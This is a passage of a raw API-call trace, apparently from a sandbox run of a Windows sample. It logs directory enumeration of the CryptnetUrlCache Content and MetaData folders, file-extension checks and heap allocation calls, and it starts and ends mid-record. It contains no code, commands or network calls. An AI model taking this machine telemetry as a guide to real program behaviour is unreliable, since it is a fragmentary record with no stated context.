lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacdd5700, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x12d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf2c360, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x234, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x6a399090, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0xe6fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xaeb57250, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C0018BB1B5834735BFA60CD063B31956") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f963e30, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f963e30, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacfc48e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0199.935] FindClose (in: hFindFile=0x2a05de8 | out: hFindFile=0x2a05de8) returned 1 [0199.936] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.936] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.936] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0199.936] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0199.936] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0199.937] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0199.937] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0199.937] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.937] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7630 | out: hHeap=0x2c0000) returned 1 [0199.937] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.937] PathFindFileNameW (pszPath="") returned="" [0199.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.937] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05de8 [0199.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.942] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.942] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x6c7fca30, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0199.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.942] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0199.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.943] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0199.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.943] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37C951188967C8EB88D99893D9D191FE") returned="" [0199.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.944] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1aa3080, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x1aa3080, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf78620, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0199.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.944] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0199.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.945] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x794f7e10, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x794f7e10, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xacf524c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0199.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.945] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0199.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.946] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7c71ad70, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7c71ad70, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x7c71ad70, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0199.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.946] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0199.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.947] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4eb51c0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x4eb51c0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0x2948f970, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0199.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.947] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0199.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.948] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x4e42da0, ftLastWriteTime.dwHighDateTime=0x1d706ab, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0199.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.948] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0199.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.949] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799de350, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x130, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0199.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.950] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0199.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.950] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xaeb57250, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xaeb57250, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xbef32960, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0199.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.951] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C0018BB1B5834735BFA60CD063B31956") returned="" [0199.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.951] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0199.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x2f5b18 [0199.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.952] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0199.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.952] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7f93dcd0, ftCreationTime.dwHighDateTime=0x1d706ab, ftLastAccessTime.dwLowDateTime=0x7f93dcd0, ftLastAccessTime.dwHighDateTime=0x1d706ab, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0199.952] FindClose (in: hFindFile=0x2a05de8 | out: hFindFile=0x2a05de8) returned 1 [0199.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0199.953] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0199.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3aa000 [0199.953] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0199.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.956] RtlAllocateHeap 